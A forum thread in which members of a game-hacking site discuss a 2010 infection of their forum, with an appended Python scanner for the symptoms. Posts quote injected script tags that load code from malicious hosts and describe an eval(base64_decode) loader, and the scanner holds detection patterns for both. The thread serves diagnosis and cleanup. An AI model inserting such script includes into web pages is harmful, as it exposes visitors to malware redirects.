My anti virus program keeps saying there's a virus here.

Started by Wario Bros, May 02, 2010, 11:37:17 AM


Peardian

Unless you've reuploaded it, I can see yours just fine.


It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.
MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!

Revned

Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.

JonLeung

I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them?  When I get home I'll give that a shot.

Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.

Peardian

Quote from: Revned on May 03, 2010, 12:12:11 PM
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
Oh, NOW it's broken. I hate the way this browser uses its cache.

bustin98

As long as the site is on a shared server, the possibility of this happening again is always going to exist. And it's not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64(decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.

Revned


Maxim

The bottom of the page contains:

<script src="http://holasionweb.com/oo.php"></script>

...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...


The Ultimate Koopa

Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: losotrana.com/js.php
Name: Virus found JS/Redir

That's what I'm getting now.

TerraEsperZ

Same thing for me. Every page on the forum causes Avast to report that trojan horse...
Current project:
Mega Man: Powered Up (PSP)

Revned

I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.

[EDIT] Never mind, it appears that it definitely is a problem with GoDaddy. Lots of other people with different software are experiencing this. I guess we'll just have to wait it out.

Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.

bustin98

It's at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.

bustin98

Well, did a deep cleaning of the site, found a random file that may be the cause or a cause of the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in... :D Seems the infection is self-replicating and all it had to do is get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.

Maybe now things can go back to normal.??
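
Added example, not part of any post in this thread: a Python sweep for the two symptoms described above, an eval(base64_decode( loader near the start of a PHP file and a script include from a host outside an allowlist. The sample files, host names, allowlist and the 512-byte "start of file" window are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Loader as described in the thread: eval(base64_decode(...)) injected into PHP files.
LOADER_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
# External script includes; the host is captured for the allowlist check.
SCRIPT_RE = re.compile(rb"<script[^>]+src=[\"']https?://([^/\"']+)", re.I)
HEAD_BYTES = 512  # assumed size of the "beginning of the file" window

SAMPLES = {  # constructed sample files, not real forum code
    "index.php": b"<?php eval(base64_decode('ZWNobyAxOw==')); ?><?php echo 'forum';",
    "Sources/Display.php": b"<?php echo 'ok'; ?>\n"
                           b'<script src="http://injected.example.invalid/x.php"></script>',
    "clean.php": b'<?php ?><script src="https://cdn.example.org/a.js"></script>',
}

def scan_file(path, allowed_hosts):
    """Return the list of findings for one file (empty if it looks clean)."""
    data = Path(path).read_bytes()
    findings = []
    m = LOADER_RE.search(data)
    if m:
        where = "head" if m.start() < HEAD_BYTES else "body"
        findings.append(f"eval-base64:{where}")
    for host in SCRIPT_RE.findall(data):
        host = host.decode("ascii", "replace").lower()
        if host not in allowed_hosts:
            findings.append(f"foreign-script:{host}")
    return findings

def scan_tree(root, allowed_hosts=frozenset()):
    """Scan every .php file under root; map relative path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        findings = scan_file(path, allowed_hosts)
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report

def demo():
    """Write the constructed samples to a temp directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(tmp, allowed_hosts={"cdn.example.org"})

if __name__ == "__main__":
    print(demo())
```

Because the injection re-adds itself whenever an infected page is hit, a sweep like this is only useful when rerun after cleanup until the report stays empty.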

marioman

It's happened again.  The following script has been added to the forum code.

<script src="http://myblindstudioinfoonline.com/ll.php"></script>

Those without reliable virus protection beware.

Peardian

Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.